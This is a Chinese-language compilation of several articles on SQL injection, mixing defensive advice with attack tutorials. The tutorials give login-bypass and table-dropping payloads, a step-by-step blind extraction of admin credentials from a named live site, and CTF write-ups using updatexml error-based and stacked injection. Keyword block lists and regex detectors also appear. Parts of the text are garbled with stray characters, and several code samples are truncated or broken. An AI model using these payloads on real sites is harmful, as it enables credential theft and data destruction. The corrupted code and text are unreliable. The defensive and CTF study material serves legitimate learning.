sql注入找flag思路

⑴ 試解釋 sql 注入攻擊的原理，以及對資料庫可能產生的不利影響。

SQL注入就是攻擊者通過正常的WEB頁面,把自己SQL代碼傳入到應用程序中,從而通過執行非程序員預期的SQL代碼,達到竊取數據或破壞的目的。

當應用程序使用輸入內容來構造動態SQL語句以訪問資料庫時，會發生SQL注入攻擊。如果代碼使用存儲過程，而這些存儲過程作為包含未篩選的用戶輸入的字元串來傳遞，也會發生SQL注入。SQL注入可能導致攻擊者使用應用程序登陸在資料庫中執行命令。如果應用程序使用特權過高的帳戶連接到資料庫，這種問題會變得很嚴重。在某些表單中，用戶輸入的內容直接用來構造（或者影響）動態SQL命令，或者作為存儲過程的輸入參數，這些表單特別容易受到SQL注入的攻擊。而許多網站程序在編寫時，沒有對用戶輸入的合法性進行判斷或者程序中本身的變數處理不當，使應用程序存在安全隱患。這樣，用戶就可以提交一段資料庫查詢的代碼，根據程序返回的結果，獲得一些敏感的信息或者控制整個伺服器，於是SQL注入就發生了。

一般SQL注入

在Web 應用程序的登錄驗證程序中,一般有用戶名(username) 和密碼(password) 兩個參數,程序會通過用戶所提交輸入的用戶名和密碼來執行授權操作。我們有很多人喜歡將SQL語句拼接起來。例如：

Select * from users where username =』 txtusername.Text 』 and password =』 txtpassword.Text 』

其原理是通過查找users 表中的用戶名(username) 和密碼(password) 的結果來進行授權訪問, 在txtusername.Text為mysql，txtpassword.Text為mary，那麼SQL查詢語句就為：

Select * from users where username =』 mysql 』 and password =』 mary 』

如果分別給txtusername.Text 和txtpassword.Text賦值』 or 『1』 = 『1』 --和abc。那麼,SQL 腳本解釋器中的上述語句就會變為:

Select * from users where username =』』or 『1』 = 『1』 -- and password =』abc』

該語句中進行了兩個條件判斷,只要一個條件成立,就會執行成功。而'1'='1'在邏輯判斷上是恆成立的,後面的"--" 表示注釋,即後面所有的語句為注釋語句這樣我們就成功登錄。即SQL注入成功.

如果我們給txtusername.Text賦值為:』;drop table users--即:

Select * from users where username =』』;drop table users-- and password =』abc』

整個用戶表就沒有了，當然這里要猜出數據表名稱。想想是多麼可怕的事情。

好我想大家在這里已經大致明白了一般SQL注入了，試想下您的登錄程序會不會出現我上述的情況。

防範SQL注入

那麼現在大家都在思考怎麼防範SQL注入了這里給出一點個人的建議

1.限制錯誤信息的輸出

這個方法不能阻止SQL注入，但是會加大SQL注入的難度，不會讓注入者輕易得到一些信息，讓他們任意破壞資料庫。SQL Server有一些系統變數，如果我們沒有限制錯誤信息的輸出，那麼注入著可以直接從出錯信息獲取，例如（假定這里用的string即字元類型並可以發生SQL注入）：http://www.xxx.com/showdetail.aspx?id=49 and user>0 這句語句很簡單，但卻包含了SQL Server特有注入方法的精髓，。首先看看它的含義：首先，前面的語句是正常的，重點在and user>0，我們知道，user是SQL Server的一個內置變數，它的值是當前連接的用戶名，類型為nvarchar。拿一個nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，當然，轉的過程中肯定會出錯，SQL Server的出錯提示是：將nvarchar值 」abc」 轉換數據類型為 int 的列時發生語法錯誤，呵呵，abc正是變數user的值，這樣，注入著就拿到了資料庫的用戶名。

眾所周知，SQL Server的用戶sa是個等同Adminstrators許可權的角色，拿到了sa許可權，幾乎肯定可以拿到主機的Administrator了。上面的方法可以很方便的測試出是否是用sa登錄，要注意的是：如果是sa登錄，提示是將」dbo」轉換成int的列發生錯誤，而不是」sa」。

當然注入者還可以輸入不同的信息來得到他們想要的信息 ，上面只是其中一個例子，所以我們要限制錯誤信息的輸出，從而保護我們的資料庫數據，這里我給出.NET限制錯誤信息的方法：

在Web.Config文件中設置

<customErrors mode="On" defaultRedirect="error.aspx">

</customErrors>

這樣當發生錯誤時候就不會講信息泄露給外人。

2.限制訪問資料庫帳號的許可權

對於資料庫的任何操作都是以某種特定身份和相應許可權來完成的,SQL語句執行前,在資料庫伺服器端都有一個用戶許可權驗證的過程,只有具備相應許可權的帳號才可能執行相應許可權內的SQL語句。因此,限制資料庫帳號許可權,實際上就阻斷了某些SQL語句執行的可能。不過,這種方法並不能根本解決SQL注入問題,因為連接資料庫的帳號幾乎總是比其他單個用戶帳號擁有更多的許可權。通過限制貼帳號許可權,可以防止刪除表的攻擊,但不能阻止攻擊者偷看別人的信息。

3.參數化使用命令

參數化命令是在SQL文本中使用佔位符的命令。佔位符表示需要動態替換的數據,它們通過Command對象Parameters集合來傳送。能導致攻擊的SQL代碼可以寫成:

Select * from employee where userID=@userID;

如果用戶輸入: 09105022』OR 『1』=』1,將得不到何記錄,因為沒有一個用戶ID與文本框中輸入的』 09105022』OR 『1』=』1』相等。參數化命令的語法隨提供程序的不同略有差異。對於SQL SERVER提供程序,參數化命令使用命名的佔位符(具有唯一的名字),而對於OLE DB提供程序,每個硬編碼的值被問號代替。使用OLE DB提供程序時,需要保證參數的順序和它們出現在SQL字元串中的位置一致。SQL SERVER提供程序沒有這樣的需求,因為它們用名字和佔位符匹配。

4.調用存儲過程

存儲過程是存儲在資料庫伺服器上的一系列SQL代碼,存儲過程與函數相似,有良好的邏輯封裝結構,可以接收和返回數據。使用存儲過程可以使代碼更易於維護,因為對存儲過程的更改不會導致應用程序的重新編譯,使用存儲過程還可以節省帶寬,提高應用程序性能。因為存儲過程是存儲在資料庫服務端的獨立的封裝體,調用存儲過程可以保證應用程序只執行存儲過程中的固定代碼,從而杜絕SQL語句注入的可能。結合上述所講的參數化命令,可以實現SQL代碼可以實現的任何功能,並進一步提高應用程序的安全等級。

5.限制輸入長度

如果在Web頁面上使用文本框收集用戶輸入的數據,使用文本框的MaxLength屬性來限制用戶輸入過長的字元也是一個很好的方法,因為用戶的輸入不夠長,也就減少了貼入大量腳本的可能性。程序員可以針對需要收集的數據類型作出一個相應的限制策略。

6.URL重寫技術

我們利用URL重寫技術過濾一些SQL注入字元，從而達到防禦SQL注入。因為許多SQL注入是從URL輸入發生的。

7.傳遞參數盡量不是字元

假設我們顯示一篇新聞的頁面，從URL傳遞參數中獲得newid我們可能會隨手寫下下面的代碼：

string newsid = Request.QueryString["newsid"];
string newssql = "select * from news where newsid=" + newsid;

如果傳遞過來的參數是數字字元就沒有問題。但是如果傳遞過來的newsid是「1 delete from table 」的話，那麼sql的值就變成了「select * from table where newsid=1 delete from news」。發生注入成功。但是這里改為

int newsid=int.Parse(Request.QueryString["newsid"].ToString());

string newssql = "select * from news where newsid=" + newsid.Tostring();

這里如果還是上面"1 delete from table "會發生錯誤，因為在轉換時候出現了錯誤

從上面的一個小例子，我們得出在傳遞參數時候盡量不要用字元，免得被注入。

最後是我想擴展下利用URL重寫技術來過濾一些SQL注入字元，首先這里有一篇關於URL重寫的文章，我的基本思想是可以利用它，屏蔽一些危險的SQL注入字元串，這些字元串我們可以人為的設定，畢竟我們還是根據特定的環境設定我們防禦措施。首先我們在MoleRewriter類中的Rewrite函數得到絕對的URL判斷其中是否有危險字元，如果有我們就將它鏈接到一個提示用戶您輸入危險的URL地址。如果不是我們繼續判斷是否觸發了其他的URL重寫的規則，觸發了就重寫。這樣就大致上能在URL上防禦危險字元。

代碼
<configSections>
<section name="RewriterConfig" type="URLRewriter.Config., URLRewriter" />
</configSections>
<RewriterConfig>
<Rules>
<RewriterRule>
<LookFor>~/d(\d+)\.aspx</LookFor>
<SendTo>~/Default_sql_error.aspx</SendTo>
</RewriterRule>
<RewriterRule>
<LookFor>~/d(\d+)\.aspx</LookFor>
<SendTo>~/Default2.aspx</SendTo>
</RewriterRule>
</Rules>
</RewriterConfig>
<httpMoles>
<add type="URLRewriter.MoleRewriter, URLRewriter" name="MoleRewriter" />
</httpMoles>

上面是要在web.config配置文件加上的內容，這里我加上了兩個重寫規則，第一個規則是專門針對滿足這個正則表達式的頁面URL查看是否有危險字元，有危險字元就會發送到Default_sql_error.aspx頁面，來示警。這里我假定會發生危險字元注入的頁面時以"d"字元開頭並加上數字的頁面（這里我們可以根據實際情況自己定義，看哪些頁面URL容易發生我們就制定這些頁面的正則表達式），第二個是一般URL重寫。因為這里我採用的是HTTP模塊執行URL重寫，所以加上<httpMoles></httpMoles>這一塊。

第二步就是要在重寫Rewrite函數了

代碼
protected override void Rewrite(string requestedPath, System.Web.HttpApplication app)
{
// 獲得配置規則
RewriterRuleCollection rules = RewriterConfiguration.GetConfig().Rules;

//獲得絕對的URL
Uri url = app.Request.Url;

// 判斷url 中是否含有SQL 注入攻擊敏感的字元或字元串,如果存在,sqlatFlag = 1 ;
string urlstr = url.AbsoluteUri;
int sqlatFlag = 0;

//這里我們根據實際情況隨便編寫，我這里這是隨便列舉了幾個
string words = "exec ,xp ,sp ,declare ,cmd ,Union ,--";

string[] split = words.Split(',');
foreach (string s in split)
{
if (urlstr.IndexOf(s.ToUpper()) > 0)
{
sqlatFlag = 1;
break;
}
}
if (sqlatFlag == 1)
{
// 創建regex
Regex re = new Regex(rules[0].SendTo, RegexOptions.IgnoreCase);
// 找到匹配的規則,進行必要的替換
string sendToUrl = RewriterUtils.ResolveUrl(app.Context.Request.ApplicationPath, re.ToString());
// 重寫URL
RewriterUtils.RewriteUrl(app.Context, sendToUrl);
}
else
{
// 遍歷除rules[0 ]以外的其他URL 重寫規則
for (int i = 1; i < rules.Count; i++)
{
// 獲得要查找的模式,並且解析URL (轉換為相應的目錄)
string lookFor = "^" + RewriterUtils.ResolveUrl(app.Context.Request.ApplicationPath, rules[i].LookFor) + "$";
// 創建regex
Regex re = new Regex(lookFor, RegexOptions.IgnoreCase);
// 查看是否找到了匹配的規則
if (re.IsMatch(requestedPath))
{
// 找到了匹配的規則, 進行必要的替換
string sendToUrl = RewriterUtils.ResolveUrl(app.Context.Request.ApplicationPath, re.Replace(requestedPath, rules[i].SendTo));
// 重寫URL
RewriterUtils.RewriteUrl(app.Context, sendToUrl);
break;
// 退出For 循環
}
}
}
}

那麼下一步就是檢驗例子了

首先我們輸入http://localhost:4563/web/Default.aspx?id=1;--

這樣http://localhost:4563/web/Default.aspx?id=1;-- 沒有改變，就會顯示Default_sql_error.aspx里內容「您輸入了危險字元」。
再輸入http://localhost:4563/web/D11.aspx就會顯示 Default2.aspx內容，因為這里觸發了第二個重寫規則

⑵ JSP如何防範SQL注入攻擊

上周給別人做了個網站，無意間發現自己的作品有很多漏洞，在短短的20秒就被自己用sql注入法給幹了。所以查了一點關於sql注入的資料，並且有點感悟，希望能與新手們分享一下。高手們見笑了！
SQL注入攻擊的總體思路：
發現SQL注入位置；
判斷伺服器類型和後台資料庫類型；
確定可執行情況
對於有些攻擊者而言，一般會採取sql注入法。下面我也談一下自己關於sql注入法的感悟。
注入法：
從理論上說，認證網頁中會有型如：
select * from admin where username='XXX' and password='YYY' 的語句，若在正式運行此句之前，如果沒有進行必要的字元過濾，則很容易實施SQL注入。
如在用戶名文本框內輸入：abc』 or 1=1-- 在密碼框內輸入：123 則SQL語句變成：
select * from admin where username='abc』 or 1=1 and password=飓』 不管用戶輸入任何用戶名與密碼，此語句永遠都能正確執行，用戶輕易騙過系統，獲取合法身份。
猜解法：
基本思路是：猜解所有資料庫名稱，猜出庫中的每張表名，分析可能是存放用戶名與密碼的表名，猜出表中的每個欄位名，猜出表中的每條記錄內容。
還有一鍵消昌種方式可以獲得你的資料庫名和每張表的名。
就是通過在形如
對於jsp而言我們一般採取一下策略來應對：
1、PreparedStatement
如果你已經是稍有水平開發者,你就應該始終以PreparedStatement代替Statement.
以下是幾點原因
1、代碼的可讀性和可維護性.
2、PreparedStatement盡最大可能提高性能.
3、最重要的一點是極大地提高了安全性.
到目前為止，有一些人（包括本人）連基本的惡義SQL語法都不知道.
String sql = "select * from tb_name where name= '"+varname+"' and passwd='"+varpasswd+"'";
如果我們把[' or Ƈ' = Ƈ]作為name傳入進來.密碼隨意,看看會成為什麼? 網管網
select * from tb_name = 'or Ƈ' = Ƈ' and passwd = '隨意' ;
因為Ƈ'=Ƈ'肯定成立,所以可以任何通過驗證.更有甚者:
把[' drop table tb_name; ]作為varpasswd傳入進來,則:
select * from tb_name = '隨意' and passwd = '' drop table tb_name; 有些資料庫是不會讓你成功的,但也有很多資料庫就可以使這些語句得到執行.
而如果你使用預編譯語句.你傳入的任何內容就不會和原來的語句發生任何匹配的關系.(前提是資料庫本身支持預編譯,但上前可能沒有什麼服務端資料庫不支持編譯了橋團,只有少數的桌面資料庫,就是直接文件稿扒訪問的那些只要全使用預編譯語句,你就用不著對傳入的數據做任何過慮.而如果使用普通的 statement,有可能要對drop,; 等做費盡心機的判斷和過慮.
2、正則表達式
2.1、檢測SQL meta-characters的正則表達式 /(\%27)|(')|(--)|(\%23)|(#)/ix
2.2、修正檢測SQL meta-characters的正則表達式 /((\%3D)|(=))[^ ]*((\%27)|(')|(--)
|(\%3B)|(:))/i
2.3、典型的 SQL 注入攻擊的正則表達式 /w*((\%27)|('))((\%6F)|o|(\%4F))((\%72)|r|( 中國網管聯盟
%52))/ix
2.4、檢測SQL注入，UNION查詢關鍵字的正則表達式 /((\%27)|('))union/ix(\%27)|(') - 單
引號和它的hex等值
union - union關鍵字。
2.5、檢測MS SQL Server SQL注入攻擊的正則表達式 /exec(s|+)+(s|x)pw+/ix
3、字元串過濾
public static String filterContent(String content){
String flt ="'|and|exec|insert|select|delete|update|count|*|%
|chr|mid|master|truncate|char|declare|; |or|-|+|,";
Stringfilter[] = flt.split("|");
for(int i=0; i {
content.replace(filter[i], "");
}
return content;
}
4、不安全字元屏蔽
本部分採用js來屏蔽，起的作用很小，這樣用屏蔽關鍵字的方法雖然有一定作用，但是在實際應用中這些 SQL的關鍵字也可能成為真正的查詢關鍵字，到那是被你屏蔽了那用戶不是不能正常的使用了。 只要在代碼規范上下點功夫就可以了。
凡涉及到執行的SQL中有變數時，用JDBC（或者其他數據持久層）提供的如：PreparedStatement就可以 ，切記不要用拼接字元串的方法就可以了.
功能介紹：檢查是否含有"'","\","/"
參數說明：要檢查的字元串
返回值：0：是 1：不是
函數名是
function check(a)
{
return 1;
fibdn = new Array ("'" ,"\","/");
i=fibdn.length;
j=a.length;
for (ii=0; ii { for (jj=0; jj
{ temp1=a.charAt(jj);
temp2=fibdn[ii];
if (tem' p1==temp2)
{ return 0; }
}
}
return 1;
}
-

⑶ sql注入攻擊的原理

sql注入攻擊的原理：SQL 注入（SQLi）是一種可執行惡意 SQL 語句的注入攻擊。這些 SQL 語句可控制網站背後的資料庫服務。攻擊者可利用 SQL 漏洞繞過網站已有的安全措施。他們可繞過網站的身份認證和授權並訪問整個 SQL 資料庫的數據。他們也可利用 SQL 注入對數據進行增加、修改和刪除操作。

為了發起 SQL 注入攻擊，攻擊者首先需要在網站或應用程序中找到那些易受攻擊的用戶輸入。這些用戶輸入被有漏洞的網站或應用程序直接用於 SQL 查詢語句中。攻擊者可創建這些輸入內容。這些內容往往被稱為惡意載體，它們是攻擊過程中的關鍵部分。隨後攻擊者將內容發送出去，惡意的 SQL 語句便會在資料庫中被執行。

⑷ 舉例說明SQL注入的一般過程！

如果你以前沒試過SQL注入的話，那麼第一步先把IE菜單=>工具=>Internet選項=>高級=>顯示友好 HTTP 錯誤信息前面的勾去掉。否則，不論伺服器返回什麼錯誤，IE都只顯示為HTTP 500伺服器錯誤，不能獲得更多的提示信息。

第一節、SQL注入原理

以下我們從一個網站www.19cn.com開始（註：本文發表前已徵得該站站長同意，大部分都是真實數據）。

在網站首頁上，有名為「IE不能打開新窗口的多種解決方法」的鏈接，地址為：http://www.19cn.com/showdetail.asp?id=49，我們在這個地址後面加上單引號』，伺服器會返回下面的錯誤提示：

Microsoft JET Database Engine 錯誤 '80040e14'
字元串的語法錯誤 在查詢表達式 'ID=49'' 中。
/showdetail.asp，行8

從這個錯誤提示我們能看出下面幾點：

1.網站使用的是Access資料庫，通過JET引擎連接資料庫，而不是通過ODBC。
2.程序沒有判斷客戶端提交的數據是否符合程序要求。
3.該SQL語句所查詢的表中有一名為ID的欄位。

從上面的例子我們可以知道，SQL注入的原理，就是從客戶端提交特殊的代碼，從而收集程序及伺服器的信息，從而獲取你想到得到的資料。

第二節、判斷能否進行SQL注入

看完第一節，有一些人會覺得：我也是經常這樣測試能否注入的，這不是很簡單嗎？其實，這並不是最好的方法，為什麼呢？

首先，不一定每台伺服器的IIS都返回具體錯誤提示給客戶端，如果程序中加了cint(參數)之類語句的話，SQL注入是不會成功的，但伺服器同樣會報錯，具體提示信息為處理 URL 時伺服器上出錯。請和系統管理員聯絡。

其次，部分對SQL注入有一點了解的程序員，認為只要把單引號過濾掉就安全了，這種情況不為少數，如果你用單引號測試，是測不到注入點的

那麼，什麼樣的測試方法才是比較准確呢？答案如下：

① http://www.19cn.com/showdetail.asp?id=49
② http://www.19cn.com/showdetail.asp?id=49 and 1=1
③ http://www.19cn.com/showdetail.asp?id=49 and 1=2

這就是經典的1=1、1=2測試法了，怎麼判斷呢？看看上面三個網址返回的結果就知道了：

可以注入的表現：

① 正常顯示（這是必然的，不然就是程序有錯誤了）
② 正常顯示，內容基本與①相同
③ 提示BOF或EOF（程序沒做任何判斷時）、或提示找不到記錄（判斷了rs.eof時）、或顯示內容為空（程序加了on error resume next）

不可以注入就比較容易判斷了，①同樣正常顯示，②和③一般都會有程序定義的錯誤提示，或提示類型轉換時出錯。

當然，這只是傳入參數是數字型的時候用的判斷方法，實際應用的時候會有字元型和搜索型參數，我將在中級篇的「SQL注入一般步驟」再做分析。

第三節、判斷資料庫類型及注入方法

不同的資料庫的函數、注入方法都是有差異的，所以在注入之前，我們還要判斷一下資料庫的類型。一般ASP最常搭配的資料庫是Access和SQLServer，網上超過99%的網站都是其中之一。

怎麼讓程序告訴你它使用的什麼資料庫呢？來看看：

SQLServer有一些系統變數，如果伺服器IIS提示沒關閉，並且SQLServer返回錯誤提示的話，那可以直接從出錯信息獲取，方法如下：

http://www.19cn.com/showdetail.asp?id=49 and user>0

這句語句很簡單，但卻包含了SQLServer特有注入方法的精髓，我自己也是在一次無意的測試中發現這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點在and user>0，我們知道，user是SQLServer的一個內置變數，它的值是當前連接的用戶名，類型為nvarchar。拿一個nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，當然，轉的過程中肯定會出錯，SQLServer的出錯提示是：將nvarchar值 」abc」 轉換數據類型為 int 的列時發生語法錯誤，呵呵，abc正是變數user的值，這樣，不廢吹灰之力就拿到了資料庫的用戶名。在以後的篇幅里，大家會看到很多用這種方法的語句。

順便說幾句，眾所周知，SQLServer的用戶sa是個等同Adminstrators許可權的角色，拿到了sa許可權，幾乎肯定可以拿到主機的Administrator了。上面的方法可以很方便的測試出是否是用sa登錄，要注意的是：如果是sa登錄，提示是將」dbo」轉換成int的列發生錯誤，而不是」sa」。

如果伺服器IIS不允許返回錯誤提示，那怎麼判斷資料庫類型呢？我們可以從Access和SQLServer和區別入手，Access和SQLServer都有自己的系統表，比如存放資料庫中所有對象的表，Access是在系統表[msysobjects]中，但在Web環境下讀該表會提示「沒有許可權」，SQLServer是在表[sysobjects]中，在Web環境下可正常讀取。

在確認可以注入的情況下，使用下面的語句：

http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from sysobjects)>0
http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from msysobjects)>0

如果資料庫是SQLServer，那麼第一個網址的頁面與原頁面http://www.19cn.com/showdetail.asp?id=49是大致相同的；而第二個網址，由於找不到表msysobjects，會提示出錯，就算程序有容錯處理，頁面也與原頁面完全不同。

如果資料庫用的是Access，那麼情況就有所不同，第一個網址的頁面與原頁面完全不同；第二個網址，則視乎資料庫設置是否允許讀該系統表，一般來說是不允許的，所以與原網址也是完全不同。大多數情況下，用第一個網址就可以得知系統所用的資料庫類型，第二個網址只作為開啟IIS錯誤提示時的驗證。
第一節、SQL注入的一般步驟

首先，判斷環境，尋找注入點，判斷資料庫類型，這在入門篇已經講過了。

其次，根據注入參數類型，在腦海中重構SQL語句的原貌，按參數類型主要分為下面三種：

(A) ID=49 這類注入的參數是數字型，SQL語句原貌大致如下：
Select * from 表名 where 欄位=49
注入的參數為ID=49 And [查詢條件]，即是生成語句：
Select * from 表名 where 欄位=49 And [查詢條件]

(B) Class=連續劇 這類注入的參數是字元型，SQL語句原貌大致概如下：
Select * from 表名 where 欄位=』連續劇』
注入的參數為Class=連續劇』 and [查詢條件] and 『』=』 ，即是生成語句：
Select * from 表名 where 欄位=』連續劇』 and [查詢條件] and 『』=』』

(C) 搜索時沒過濾參數的，如keyword=關鍵字，SQL語句原貌大致如下：
Select * from 表名 where 欄位like 』%關鍵字%』
注入的參數為keyword=』 and [查詢條件] and 『%25』=』， 即是生成語句：
Select * from 表名 where欄位like 』%』 and [查詢條件] and 『%』=』%』

接著，將查詢條件替換成SQL語句，猜解表名，例如：

ID=49 And (Select Count(*) from Admin)>=0

如果頁面就與ID=49的相同，說明附加條件成立，即表Admin存在，反之，即不存在（請牢記這種方法）。如此循環，直至猜到表名為止。

表名猜出來後，將Count(*)替換成Count(欄位名)，用同樣的原理猜解欄位名。

有人會說：這里有一些偶然的成分，如果表名起得很復雜沒規律的，那根本就沒得玩下去了。說得很對，這世界根本就不存在100%成功的黑客技術，蒼蠅不叮無縫的蛋，無論多技術多高深的黑客，都是因為別人的程序寫得不嚴密或使用者保密意識不夠，才有得下手。

有點跑題了，話說回來，對於SQLServer的庫，還是有辦法讓程序告訴我們表名及欄位名的，我們在高級篇中會做介紹。

最後，在表名和列名猜解成功後，再使用SQL語句，得出欄位的值，下面介紹一種最常用的方法－Ascii逐字解碼法，雖然這種方法速度很慢，但肯定是可行的方法。

我們舉個例子，已知表Admin中存在username欄位，首先，我們取第一條記錄，測試長度：

http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len(username) from Admin)>0

先說明原理：如果top 1的username長度大於0，則條件成立；接著就是>1、>2、>3這樣測試下去，一直到條件不成立為止，比如>7成立，>8不成立，就是len(username)=8

當然沒人會笨得從0,1,2,3一個個測試，怎麼樣才比較快就看各自發揮了。在得到username的長度後，用mid(username,N,1)截取第N位字元，再asc(mid(username,N,1))得到ASCII碼，比如：

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同樣也是用逐步縮小范圍的方法得到第1位字元的ASCII碼，注意的是英文和數字的ASCII碼在1-128之間，可以用折半法加速猜解，如果寫成程序測試，效率會有極大的提高。

第二節、SQL注入常用函數

有SQL語言基礎的人，在SQL注入的時候成功率比不熟悉的人高很多。我們有必要提高一下自己的SQL水平，特別是一些常用的函數及命令。

Access：asc(字元) SQLServer：unicode(字元)
作用：返回某字元的ASCII碼

Access：chr(數字) SQLServer：nchar(數字)
作用：與asc相反，根據ASCII碼返回字元

Access：mid(字元串,N,L) SQLServer：substring(字元串,N,L)
作用：返回字元串從N個字元起長度為L的子字元串，即N到N+L之間的字元串

Access：abc(數字) SQLServer：abc (數字)
作用：返回數字的絕對值（在猜解漢字的時候會用到）

Access：A between B And C SQLServer：A between B And C
作用：判斷A是否界於B與C之間

第三節、中文處理方法

在注入中碰到中文字元是常有的事，有些人一碰到中文字元就想打退堂鼓了。其實只要對中文的編碼有所了解，「中文恐懼症」很快可以克服。

先說一點常識：

Access中，中文的ASCII碼可能會出現負數，取出該負數後用abs()取絕對值，漢字字元不變。

SQLServer中，中文的ASCII為正數，但由於是UNICODE的雙位編碼，不能用函數ascii()取得ASCII碼，必須用函數unicode ()返回unicode值，再用nchar函數取得對應的中文字元。

⑸ 製作網站時,SQL注入是什麼怎麼注入法

SQL注入是:

許多網站程序在編寫時，沒有對用戶輸入數據的合法性進行判斷，使應用程序存在安全隱患。用戶可以提交一段資料庫查詢代碼(一般是在瀏覽器地址欄進行,通過正常的www埠訪問)，根據程序返回的結果，獲得某些想得知的數據，這就是所謂的SQL Injection，即SQL注入。

網站的惡夢——SQL注入

SQL注入通過網頁對網站資料庫進行修改。它能夠直接在資料庫中添加具有管理員許可權的用戶，從而最終獲得系統管理員許可權。黑客可以利用獲得的管理員許可權任意獲得網站上的文件或者在網頁上加掛木馬和各種惡意程序，對網站和訪問該網站的網友都帶來巨大危害。

防禦SQL注入有妙法

第一步：很多新手從網上下載SQL通用防注入系統的程序，在需要防範注入的頁面頭部用 來防止別人進行手動注入測試。可是如果通過SQL注入分析器就可輕松跳過防注入系統並自動分析其注入點。然後只需要幾分鍾，你的管理員賬號及密碼就會被分析出來。

第二步：對於注入分析器的防範，筆者通過實驗，發現了一種簡單有效的防範方法。首先我們要知道SQL注入分析器是如何工作的。在操作過程中，發現軟體並不是沖著「admin」管理員賬號去的，而是沖著許可權(如flag=1)去的。這樣一來，無論你的管理員賬號怎麼變都無法逃過檢測。

第三步：既然無法逃過檢測，那我們就做兩個賬號，一個是普通的管理員賬號，一個是防止注入的賬號，為什麼這么說呢?筆者想，如果找一個許可權最大的賬號製造假象，吸引軟體的檢測，而這個賬號里的內容是大於千字以上的中文字元，就會迫使軟體對這個賬號進行分析的時候進入全負荷狀態甚至資源耗盡而死機。下面我們就來修改資料庫吧。

1.對表結構進行修改。將管理員的賬號欄位的數據類型進行修改，文本型改成最大欄位255(其實也夠了，如果還想做得再大點，可以選擇備注型)，密碼的欄位也進行相同設置。

2.對表進行修改。設置管理員許可權的賬號放在ID1，並輸入大量中文字元(最好大於100個字)。

3.把真正的管理員密碼放在ID2後的任何一個位置(如放在ID549上)。

我們通過上面的三步完成了對資料庫的修改。

這時是不是修改結束了呢?其實不然，要明白你做的ID1賬號其實也是真正有許可權的賬號，現在計算機處理速度那麼快，要是遇上個一定要將它算出來的軟體，這也是不安全的。我想這時大多數人已經想到了辦法，對，只要在管理員登錄的頁面文件中寫入字元限制就行了!就算對方使用這個有上千字元的賬號密碼也會被擋住的，而真正的密碼則可以不受限制。

⑹ 部分sql注入總結

本人ctf選手一名，在最近做練習時遇到了一些sql注入的題目，但是sql注入一直是我的弱項之一，所以寫一篇總結記錄一下最近學到的一些sql注入漏洞的利用。

在可以聯合查詢的題目中，一般會將資料庫查詢的數據回顯到首頁面中，這是聯合注入的前提。

適用於有回顯同時資料庫軟體版本是5.0以上的MYSQL資料庫,因為MYSQL會有一個系統資料庫information_schema， information_schema 用於存儲資料庫元數據(關於數據的數據)，例如資料庫名、表名、列的數據類型、訪問許可權等

聯合注入的過程：

判斷注入點可以用and 1=1/and 1=2用於判斷注入點

當注入類型為數字型時返回頁面會不同,但都能正常執行。

sql注入通常為數字型注入和字元型注入：

1、數字型注入

數字型語句：

在這種情況下直接使用and 1=1/and 1=2是都可以正常執行的但是返回的界面是不一樣的

2、字元型注入

字元型語句：

字元型語句輸入我們的輸入會被一對單引號或這雙引號閉合起來。

所以如果我們同樣輸入and 1=1/and 1=2會發現回顯畫面是並無不同的。

在我們傳入and 1=1/and 1=2時語句變為

傳入的東西變成了字元串並不會被當做命令。

所以字元型的測試方法最簡單的就是加上單引號 ' ，出現報錯。

加上注釋符--後正常回顯界面。

這里還有的點就是sql語句的閉合也是有時候不同的，下面是一些常見的

這一步可以用到order by函數，order by 函數是對MySQL中查詢結果按照指定欄位名進行排序，除了指定字 段名還可以指定欄位的欄位進行排序，第一個查詢欄位為1，第二個為2，依次類推，所以可以利用order by就可以判斷列數。

以字元型注入為例：

在列數存在時會正常回顯

但是列數不存在時就會報錯

這步就說明了為什麼是聯合注入了，用到了UNION，UNION的作用是將兩個select查詢結果合並

但是程序在展示數據的時候通常只會取結果集的第一行數據，這就讓聯合注入有了利用的點。

當我們查詢的第一行是不存在的時候就會回顯第二行給我們。

講查詢的數據置為-1，那第一行的數據為空，第二行自然就變為了第一行

在這個基礎上進行注入

可以發現2，3都為可以利用的顯示點。

和前面一樣利用union select，加上group_concat()一次性顯示。

現在非常多的Web程序沒有正常的錯誤回顯，這樣就需要我們利用報錯注入的方式來進行SQL注入了

報錯注入的利用步驟和聯合注入一致，只是利用函數不同。

以updatexml為例。

UpdateXML(xml_target, xpath_expr, new_xml)

xml_target： 需要操作的xml片段

xpath_expr： 需要更新的xml路徑(Xpath格式)

new_xml： 更新後的內容

此函數用來更新選定XML片段的內容，將XML標記的給定片段的單個部分替換為 xml_target 新的XML片段 new_xml ，然後返回更改的XML。xml_target替換的部分 與xpath_expr 用戶提供的XPath表達式匹配。

這個函數當xpath路徑錯誤時就會報錯，而且會將路徑內容返回，這就能在報錯內容中看到我們想要的內容。

而且以~開頭的內容不是xml格式的語法，那就可以用concat函數拼接~使其報錯，當然只要是不符合格式的都可以使其報錯。

[極客大挑戰 2019]HardSQL

登錄界面嘗試注入，測試後發現是單引號字元型注入，且對union和空格進行了過濾，不能用到聯合注入，但是有錯誤信息回顯，說明可以使用報錯注入。

利用updatexml函數的報錯原理進行注入在路徑處利用concat函數拼接~和我們的注入語句

發現xpath錯誤並執行sql語句將錯誤返回。

在進行爆表這一步發現了等號也被過濾，但是可以用到like代替等號。

爆欄位

爆數據

這里就出現了問題flag是不完整的，因為updatexml能查詢字元串的最大長度為32，所以這里要用到left函數和right函數進行讀取

報錯注入有很多函數可以用不止updatexml一種，以下三種也是常用函數：

堆疊注入就是多條語句一同執行。

原理就是mysql_multi_query() 支持多條sql語句同時執行，用;分隔，成堆的執行sql語句。

比如

在許可權足夠的情況下甚至可以對資料庫進行增刪改查。但是堆疊注入的限制是很大的。但是與union聯合執行不同的是它可以同時執行無數條語句而且是任何sql語句。而union執行的語句是有限的。

[強網杯 2019]隨便注

判斷完注入類型後嘗試聯合注入，發現select被過濾，且正則不區分大小寫過濾。

那麼就用堆疊注入，使用show就可以不用select了。

接下去獲取表信息和欄位信息

那一串數字十分可疑大概率flag就在裡面，查看一下

這里的表名要加上反單引號，是資料庫的引用符。

發現flag，但是沒辦法直接讀取。再讀取words，發現裡面有個id欄位，猜測資料庫語句為

